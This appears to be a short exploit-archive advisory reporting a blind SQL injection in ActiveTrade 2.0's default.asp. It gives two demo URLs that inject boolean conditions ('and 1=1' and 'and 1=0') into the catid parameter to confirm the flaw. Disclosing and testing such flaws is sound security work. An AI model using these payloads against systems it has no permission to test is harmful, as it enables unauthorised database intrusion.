id: 9992
date: 11/17/2009
title: ActiveTrade 2.0 (default.asp) Blind SQL Injection Vulnerability
author: Hussin X
cves: 

===============================================================
ActiveTrade 2.0 (default.asp) Blind SQL Injection Vulnerability
===============================================================

Active Trade 2.0(default.asp) Blind SQL Injection Vulnerability
____________________________________

Vendor : http://www.activewebsoftwares.com
 
Demo :
_______
 
http://server/default.asp?catid=39+and+1=1 ( true )
 
http://server/default.asp?catid=39+and+1=0 ( false )
 



#  0day.today [2023-03-27]  #